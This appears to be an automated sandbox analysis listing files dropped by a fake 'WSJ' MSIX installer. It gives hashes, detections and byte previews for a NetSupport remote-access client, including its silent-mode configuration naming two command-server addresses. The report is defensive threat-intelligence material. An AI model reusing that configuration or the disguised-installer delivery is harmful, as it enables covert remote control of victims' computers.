                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L...;..U...........!......................................................................@.............................o...T...x....0..8....................@..`E..................................`d..@...............h............................text............................... ..`.rdata../...........................@..@.data...h............|..............@....rsrc...8....0......................@..@.reloc..&F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                C:\ProgramData\netsupport\client\client32.exe

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):55456
                                                                                                                Entropy (8bit):3.9089814840046824
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:HtvrImfzoXK6DDvvvDvpvZMt+pan/opgRl2:lImfzoXK9/o66
                                                                                                                MD5:9497AECE91E1CCC495CA26AE284600B9
                                                                                                                SHA1:A005D8CE0C1EA8901C1B4EA86C40F4925BD2C6DA
                                                                                                                SHA-256:1B63F83F06DBD9125A6983A36E0DBD64026BB4F535E97C5DF67C1563D91EFF89
                                                                                                                SHA-512:4C892E5029A707BCF73B85AC110D8078CB273632B68637E9B296A7474AB0202320FF24CF6206DE04AF08ABF087654B0D80CBECFAE824C06616C47CE93F0929C9
                                                                                                                Malicious:true
                                                                                                                Yara Hits:
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\netsupport\client\client32.exe, Author: Joe Security
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                Reputation:low
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........H..&...&...&.<.{...&...'...&.@."...&...-...&.x. ...&.Rich..&.........PE..L....Y.K............................ ........ ....@..................................'.......................................0..<....@...r..........P...P............ ..............................................X0...............................text............................... ..`.rdata....... ....... ..............@..@.idata.......0.......0..............@....rsrc....r...@.......@..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                C:\ProgramData\netsupport\client\client32.ini

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):631
                                                                                                                Entropy (8bit):5.391705768502912
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:ix/vONhH+9GSyDHlsVTXuZ7/PfY8ADfDWQCYubluyzWqTLuGY:ipOhe9CHlLl1ufD/uL6qHuf
                                                                                                                MD5:ADFFA0C2FEDB1506087178C51EFBD377
                                                                                                                SHA1:A3218FA2FBEFAA5447B970481A575FCDEA0BD2F7
                                                                                                                SHA-256:6B115C0C710BB0DFB234D297B0E8A862D8AFF972CE9915B3FDFBC4D12A698D6F
                                                                                                                SHA-512:2284360ED332D66856C8A78698D1A4AD4D9919F3D1E08E5C6A648391C529EBEF66B1AF081EC88EFBE9BCD68375B2243D76BF5532CDA5F831642FEF4B1CA57F07
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:0x553755d7....[Client].._present=1..AlwaysOnTop=0..AutoICFConfig=1..DisableChat=1..DisableChatMenu=1..DisableDisconnect=1..DisableMessage=1..DisableReplayMenu=1..DisableRequestHelp=1..Protocols=3..Shared=1..silent=1..SKMode=1..SOS_Alt=0..SOS_LShift=0..SOS_RShift=0..SysTray=0..UnloadMirrorOnDisconnect=0..Usernames=*..ValidAddresses.TCP=*....[_Info]..Filename=C:\Users\Public\Pictures\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0....[HTTP]..CMPI=60..GatewayAddress=5.8.63.140:443..GSK=GB;E>BBOGO<L@JDAFB:P?NBHGH:L?D..SecondaryGateway=185.174.102.62:443..SecondaryPort=443..

                                                                                                                C:\ProgramData\netsupport\client\msvcr100.dll

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):773968
                                                                                                                Entropy (8bit):6.901559811406837
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                                                                MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                                                                SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                                                                SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                                                                SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                                                                Malicious:false
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                Reputation:low
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                C:\ProgramData\netsupport\client\nskbfltr.inf

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:Windows setup INFormation
                                                                                                                Category:dropped
                                                                                                                Size (bytes):328
                                                                                                                Entropy (8bit):4.93007757242403
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                                                                MD5:26E28C01461F7E65C402BDF09923D435
                                                                                                                SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                                                                SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                                                                SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......

                                                                                                                C:\ProgramData\netsupport\client\nsm_vpro.ini

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):46
                                                                                                                Entropy (8bit):4.532048032699691
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:lsylULyJGI6csM:+ocyJGIPsM
                                                                                                                MD5:3BE27483FDCDBF9EBAE93234785235E3
                                                                                                                SHA1:360B61FE19CDC1AFB2B34D8C25D8B88A4C843A82
                                                                                                                SHA-256:4BFA4C00414660BA44BDDDE5216A7F28AECCAA9E2D42DF4BBFF66DB57C60522B
                                                                                                                SHA-512:EDBE8CF1CBC5FED80FEDF963ADE44E08052B19C064E8BCA66FA0FE1B332141FBE175B8B727F8F56978D1584BAAF27D331947C0B3593AAFF5632756199DC470E5
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:[COMMON]..Storage_Enabled=0..Debug_Level=0....

                                                                                                                C:\ProgramData\netsupport\client\pcicapi.dll

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):33144
                                                                                                                Entropy (8bit):6.737780491933496
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:FFvNhAyi5hHA448qZkSn+EgT8To1iTYiu:FCyoHA448qSSzgI2GQ
                                                                                                                MD5:DCDE2248D19C778A41AA165866DD52D0
                                                                                                                SHA1:7EC84BE84FE23F0B0093B647538737E1F19EBB03
                                                                                                                SHA-256:9074FD40EA6A0CAA892E6361A6A4E834C2E51E6E98D1FFCDA7A9A537594A6917
                                                                                                                SHA-512:C5D170D420F1AEB9BCD606A282AF6E8DA04AE45C83D07FAAACB73FF2E27F4188B09446CE508620124F6D9B447A40A23620CFB39B79F02B04BB9E513866352166
                                                                                                                Malicious:true
                                                                                                                Yara Hits:
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\netsupport\client\pcicapi.dll, Author: Joe Security
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                • Antivirus: Virustotal, Detection: 3%, Browse
                                                                                                                Reputation:low
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                C:\ProgramData\netsupport\client\remcmdstub.exe

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):63320
                                                                                                                Entropy (8bit):6.439464682558898
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:bJfanvXuN86jJ9hUHYBlXUYwT24a+yVwQ:lanPGjJTU4IYia+yVX
                                                                                                                MD5:35DA3B727567FAB0C7C8426F1261C7F5
                                                                                                                SHA1:B71557D67BCD427EF928EFCE7B6A6529226415E6
                                                                                                                SHA-256:89027F1449BE9BA1E56DD82D13A947CB3CA319ADFE9782F4874FBDC26DC59D09
                                                                                                                SHA-512:14EDADCEECEB95F5C21FD3A0A349DD2A312D1965268610D6A6067049F34E3577FC96F6BA37B1D6AB8CE21444208C462FA97FAB24BBCD77059BC819E12C5EFC5A
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                • Antivirus: Virustotal, Detection: 3%, Browse
                                                                                                                Reputation:low
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........(T-.I:~.I:~.I:~..~.I:~.1.~.I:~.I;~.I:~..~.I:~..~.I:~..~.I:~..~.I:~Rich.I:~........PE..L.....(Y.....................J.......!............@.......................... .......D....@....................................<.......T...............X'..............................................@...............@............................text............................... ..`.rdata..,%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                                                C:\ProgramData\netsupport\netsupport.zip

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2254634
                                                                                                                Entropy (8bit):7.9971005277446485
                                                                                                                Encrypted:true
                                                                                                                SSDEEP:49152:x7VQNflTPMa/OxjJ1hQKa/ZK770FH244xSbBVLmLELJ6QWT:ZePMa/OxhF46YFH2HSbnCLQS
                                                                                                                MD5:D9B6C10970B94D21E3F2077B54A63818
                                                                                                                SHA1:98F404CB5CE1D0D90A56F20377DF3861F2164C25
                                                                                                                SHA-256:7441C425B0EC105239414AF3341A42A5D0F9D4FD9495DB03D48746D9914AB438
                                                                                                                SHA-512:C24BBFF0A5928C8679A7E2F09457CE4FC56DFA31FA02C9C8FEE16FFB1D287805956AB70C373F58713CF85D1EC0A477BC8AC793FF153AE8EB422B0B776C83EC4A
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:PK.........X.............. .client/UT...J=.fL=.fJ=.fux.............PK........m.zX........w..... .client/client32.iniUT...~..fJ=.fJ=.fux.............]Q.n.@.|G.G...6v......S.!}.#..k.....;....#(......hn...p...f.:..p..<..U.q$..D...:..l...3r...)N.l.+..3..B.'...(..R...u.hM.p....t.......o-[(id-.&S.)/TAci......d3..yy.....+/....Q.+E{;>..i.1....Uj......|q...&j..J.....,.x.....6..I.<.K}(.g..C.j......N:...~.c5..x..1.^.t.5.Z.}.....Q...E9Jb..A3q.[..P...MU..M.bK.H.....1?...o>........'i...8...v...*Z....W.I7....K.......Hp.z.b....O.>D.T...?PK..C..?....w...PK........J.nX........xm.... .client/AudioCapture.dllUT...<3.e...f.g.eux...............|SE.0~.....PZ.R.HE...R..B.R.BBmJ........{.W.eo..r.....+....vw]...6.m.Q..h..U..b....z...$iR....>.......{g..3gf.s.GJo...9...O.9..c...K.#.7f...p/..1.......US...k./.;...).{.j....?.hyY.}..[.]j....k.......;/...go......]A.W...s..Ma~5o.....?;k...y.&....7.....r#.0..;.-5$r.m.Gy8..K.:..q.B...........Pn..N..P..7P.....,.%..^....k......

                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):12365
                                                                                                                Entropy (8bit):4.92618019298323
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:3Vib4uWGPVoGIpN6KQkj2kkjh4iUx/UpucYKib4o:3GWGPV3IpNBQkj2Nh4iUx/UpucYR
                                                                                                                MD5:05B33D51AE63729F598F931152C2954F
                                                                                                                SHA1:35D2E60083473EB4AC1227675D4CF7D22C41A4A7
                                                                                                                SHA-256:D83566BB9BE1FDB91C53DD75825B5B39C88003054CA24FD8596E98CB7ACA7B2C
                                                                                                                SHA-512:B7B0F717164F54F2DE7E34C76717436CF49A6212B7300BC9AF1CE07C296B6F57938C176D7F4661C931005A50CA8BB70ADC152791AA1AA55018A52D072DE08451
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):20296
                                                                                                                Entropy (8bit):5.66777380461305
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:y5jrz5B0MufPpRipvHn4vr7YSvBSHFQuqUKb3+rqHBcsLCYjVL7BOUxMlplE:CrsME4avrESvSa/tr7CwVL7t6lo
                                                                                                                MD5:E1256E2C30ED3D6D3E7B29A225162A1B
                                                                                                                SHA1:973179FEF2DDC6F5262B601572760132C21D2505
                                                                                                                SHA-256:E030FB688FCC941388AD898DD27D04F9623DED8B855839711A65665AFB92ED28
                                                                                                                SHA-512:100E7733C19505354FDB35E3970399A64F2838146EE4661541EE1915E3FA518FE64E8ED225C344ECD7CD472183A8F6B378C1DEA735FA499E202A714DE5EEB690
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:@...e...............6...........5.....N...r.....................H...............o..b~.D.poM...4..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.....%.......System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.H...............RZ.zI..@..9..lD.........Microsoft.PowerShell.Activities.T...............T....I..,....d#.....).Microsoft.PowerShell.Workflow.Se

                                                                                                                C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\Temp\APPX.a7eg2nv0h_5ll4mprtt9uojee.tmp

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):4883
                                                                                                                Entropy (8bit):7.62020807561374
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:lQNvGR7mkSZY8nic4MCyTpG/GB6ii8IzIBae2LEgShh:2vE6kSDnicMp/Q6ii8GbIhh
                                                                                                                MD5:7D82356CA0C82928CAE8164AD50FE4FA
                                                                                                                SHA1:FF16792B2DD93056DE10AF08A5A3E21A99DDDCC6
                                                                                                                SHA-256:568FA08C595B210B08EB9DB3141A8BF9AE29518B2604C9B4D0283BF62A1B2D6A
                                                                                                                SHA-512:EDCE5216F6A6D3F7462B3629FDC3DF44EEB01938C9B9E8FDE1164159E2285FC19F8AF80F6D27AC70C0C3F2C94F40577AFFCCE49C68D291D513AAC95DBFC64389
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:PKCX0.....*.H..........0......1.0...`.H.e......0.....+.....7.......0...05..+.....7...0'........K......M.n#.9..................0..0...`.H.e.........APPXAXPC..z..j..z=........:...M@+%.f.%AXCD...5..5.K-...d...)d..T.;.0..AXCT..{....SI..........{..j.....AXBM...k...nfX.N..8....k.....izY.[.AXCI.vc[N.ki=....v....NC.oA.......Q.....0...0.........w....Y...GaS.?u.0...*.H........0S1.0...U....BE1.0...U....GlobalSign nv-sa1)0'..U... GlobalSign Code Signing Root R450...200728000000Z..300728000000Z0\1.0...U....BE1.0...U....GlobalSign nv-sa1200..U...)GlobalSign GCC R45 EV CodeSigning CA 20200.."0...*.H.............0......... ....2C.[..#. ^.8...,..A..U..S.....z9\..................L..JDP.x..j......|./..W3.X{..m...&*..Or..{d...U_....,...%.}Q+..I._...5...../.J../p....3..@.........S.R.xLQ........t.............q....A3 u........&w.m..I.........{.^..$.co~..a.U.$..6.........&...V...........4..&...xm..<....a..p6.y...s...,...X.96H.;Z.".t..,.......Im..kc ].~;.C.b:.....7.$

                                                                                                                C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\Temp\APPX.f8j4vx3e8n8wro9sxg8skwvnf.tmp

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe
                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (454), with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2286
                                                                                                                Entropy (8bit):5.433441056469513
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:3jRATANBAN3AMAWH6z8Nz0NgjFTJ1zx5slE5pDCbB/uzD2uu3uzjzfov62PoGz:TRATANBAN3AMAy6INRFFAE5pOb0zD2uS
                                                                                                                MD5:96F7351744D6634543522C06A3BAC5B3
                                                                                                                SHA1:B480858E7965127B80628F41B1CB0693F42B526D
                                                                                                                SHA-256:294B778D99A84C1ECC82CC82013C94EF4E19F563F03986BD0FB12E2D9C1B88E8
                                                                                                                SHA-512:C780AD5444AB5A0EC96169E8E0956A642DE7D73E05CBE3FF6877CA1A12BFBCA898731DC7EB2C63A8E37D7F4B73BF1BBF5B41C4BD68FF9A52B89D4A7216287A93
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<Package xmlns="http://schemas.microsoft.com/appx/manifest/foundation/windows10" xmlns:uap="http://schemas.microsoft.com/appx/manifest/uap/windows10" xmlns:uap10="http://schemas.microsoft.com/appx/manifest/uap/windows10/10" xmlns:desktop7="http://schemas.microsoft.com/appx/manifest/desktop/windows10/7" xmlns:rescap="http://schemas.microsoft.com/appx/manifest/foundation/windows10/restrictedcapabilities" IgnorableNamespaces="uap uap10 desktop7 rescap">.. Package created by MSIX Packaging Tool version: 1.2023.1005.0-->.. <Identity Name="WSJ" Publisher="E=admin@softwarepoland.com, CN=SOFTWARE SP Z O O, O=SOFTWARE SP Z O O, STREET=UL. PULAWSKA 538, L=WARSZAWA, S=MAZOWIECKIE, C=PL, OID.1.3.6.1.4.1.311.60.2.1.3=PL, SERIALNUMBER=0000682860, OID.2.5.4.15=Private Organization" Version="4.12.77.0" ProcessorArchitecture="x64" />.. <Properties>.. <DisplayName>WSJ</DisplayName>.. <PublisherDisplayName>WSJ</PublisherDisplayName>.. <Descriptio

                                                                                                                C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\Temp\APPX.h150xbbh9hh9t9qrahcglr31d.tmp

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe
                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines (4464), with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):4520
                                                                                                                Entropy (8bit):5.872791821604633
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:aLVTL/K2vDd56Lhu2GpL8cdjojlUmwkCzGiNNpzh1gHmn4:2H/K2vDd56FGDcjlJwzGi5zh1mmn4
                                                                                                                MD5:B3D4042B64606093790944886F6934E2
                                                                                                                SHA1:5EE47CD14FD471F84068AA9CAC0C2E3CC0F18F65
                                                                                                                SHA-256:8308B56B83F71E6E6658BD4EB49C3892B4F1A0FF6B1D090AF80D697A591C5B06
                                                                                                                SHA-512:96CDAD4A50E0C7DA9D7E493158C623270E90FB3A6405B35F987FDC5BE2E4E14B1E6E89F8F95BAA2482301F2172F2FE093E837A4A345E20EF7D5643EF39F2AEEC
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>..<BlockMap xmlns="http://schemas.microsoft.com/appx/2010/blockmap" xmlns:b4="http://schemas.microsoft.com/appx/2021/blockmap" IgnorableNamespaces="b4" HashMethod="http://www.w3.org/2001/04/xmlenc#sha256"><File Name="Registry.dat" Size="49152" LfhSize="42"><Block Hash="G4jbvtijEzAIwzqfWjHJjrM12wgTaISZNWfiBSr7Kc8=" Size="11090"/></File><File Name="User.dat" Size="20480" LfhSize="38"><Block Hash="9ZLZtias4ziA/vGSxlIy9on36EuAmeWWSzjWRguOlRI=" Size="4769"/></File><File Name="Assets\logo.png" Size="3659" LfhSize="45"><Block Hash="CmRUX2Mq1Flp9iu9jiujmCCpWefOo+rN+aclBy/37To=" Size="3645"/></File><File Name="config.json" Size="363" LfhSize="41"><Block Hash="dkIDkZzNgEGOgvRcQCIpQ3Z4vmSOXysvqLK3YvHhXpE=" Size="227"/></File><File Name="tOUKLPvSz.ps1" Size="5972" LfhSize="43"><Block Hash="GRqHZtqYsfmSByBFkFz4LHcdjLn2l9CIc2hneNxwx/Y=" Size="1756"/></File><File Name="PsfLauncher32.exe" Size="309680" LfhSize="47"><Block Hash="d/RZmV8GU+7muFwL9+c1

                                                                                                                C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\Temp\APPX.u5y27yz6k3vi25fmvsudde2mb.tmp

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):6112
                                                                                                                Entropy (8bit):7.482666373512879
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:213iHAUCbBz4R7mkSZY8nic4MCyTpG/GB6ii8IzIBaWyyd9Db:2RFW6kSDnicMp/Q6ii8GJyPf
                                                                                                                MD5:11BF9AC5BD7C0A23C4C8AB7D130D066D
                                                                                                                SHA1:7DA13AB8263D173D78362858597BFAECE0DC7FED
                                                                                                                SHA-256:8F76635B4EDD6B693DDF16FADE7688EA7F0C4E43896F41D0D0FCF41EEBF55190
                                                                                                                SHA-512:1C64FC2FB7A5D5A5CC35CDFFF9BDC397561334C3AF335A3EA962CDFA3E6851573C95E3FEB120F1B611F4C8CB3546CC17EA1FDD301065FC3ECECB2019F2A1EB82
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:0.....*.H..........0......1.0...`.H.e......0.....+.....7......0...0...+.....7......I...+.B.I........240424234820Z0...+.....7.....0..\0*.....l.`.I.....'.1.0...+.....7...1...0*...N.{...M..p.......%1.0...+.....7...1...0*......G..1g..t6;u_..$1.0...+.....7...1...0*......G..1g..t6;u_..$1.0...+.....7...1...0... '~6j.8.-.P.}..F\{..B.L..SWJg..1q0...+.....7...1...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... '~6j.8.-.P.}..F\{..B.L..SWJg..0... *.+...hO._.`(..G#l....R....R.(1q0...+.....7...1...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... *.+...hO._.`(..G#l....R....R.(0*..P..Y......3.h...6. .1.0...+.....7...1...0... i...\]...).@C...o...pna.+Q]...#.1q0...+.....7...1...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... i...\]...).@C...o...pna.+Q]...#.0... ...F.6......e.v.d".O.....w_.1q0...+.....7...1...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... ...F.6......e.v.d".O.....w_.0*....[=q..u .u........#1.0...+.....7..

                                                                                                                C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\LocalCache\WSJ_4.12.77.0_x64__v3spfewvfazpe{10030ca7-2d34-4b5d-ab65-42a8a50302a9}_temp.pri

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):5176
                                                                                                                Entropy (8bit):4.738584155977204
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:WPDIBImIIIFICItiIPIuiImIjiIxIUiIYIpiIS6/37LCOXT4aICInowoq8RI6I64:WP5I7j0Xowoq8NqsOqC
                                                                                                                MD5:CE102C4B1736BF61F34E14F0173FEE89
                                                                                                                SHA1:D166E454CA33520E0C76EFECADAC0224B93E60CC
                                                                                                                SHA-256:AE0E328618800983358B154262102EA2E73823108D7F86C62A37DC91377F5DF3
                                                                                                                SHA-512:5F3BFA7F4F12047A95B71A44DA3F1CD06357D0A06B8257EDED0DE40FD1E6D650F892A529F6AE9368E4AC5B6F9B5A17213FB5F641500F6A6075D1CF5C4A8C05A3
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:mrm_pri2....8... ...............[mrm_decn_info].............0...[mrm_pridescex].........0...`...[mrm_hschemaex] ................[mrm_res_map2_].........x.......[mrm_dataitem] .........P...`...[mrm_dataitem] .............`...[mrm_dataitem] .............`...[mrm_dataitem] .........p...`...[mrm_dataitem] .............(...[mrm_dataitem] .............p...[mrm_dataitem] .........h.......[mrm_dataitem] .............p...[mrm_dataitem] .........X.......[mrm_dataitem] .............p...[mrm_dataitem] .........H.......[mrm_dataitem] .............p...[mrm_dataitem] .........8.......[mrm_dataitem] .............p...[mrm_dataitem] .........(.......[mrm_decn_info].........0...............-...................................................................................................V.......}.............................,.......d.......,.......,.......,.......,.............................................................................................................!...........$...........(.......

                                                                                                                C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\TempState\AILog.txt

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
